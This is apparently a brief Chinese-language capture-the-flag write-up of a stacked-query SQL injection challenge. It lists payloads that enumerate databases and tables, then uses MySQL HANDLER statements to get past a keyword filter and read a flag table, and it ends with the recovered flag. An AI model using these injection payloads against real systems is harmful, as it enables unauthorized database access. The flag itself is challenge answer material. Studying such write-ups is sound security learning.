这道题之前我们做过,链接看这里https://www.cnblogs.com/junlebao/p/13681278.html
1';show databases;# //获取数据库名
1';show tables;# //获取表名
1’;desc `表名` //获取表结构
当我们再次使用修改字段名这种方式的时候,发现过滤了这些关键字,该怎么办呢
于是,我们查了百度,然后又学会了一个新姿势
HANDLER [表名] OPEN;语句打开一个表,使其可以使用后续HANDLER [表名] READ;该表对象未被其他会话共享,并且在会话调用HANDLER [表名] CLOSE;或会话终止之前不会关闭
1’;
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere close;#
执行这个,然后,就可以出来flag了
flag{4541eb28-dd41-4d34-a45e-6006e893fe4f}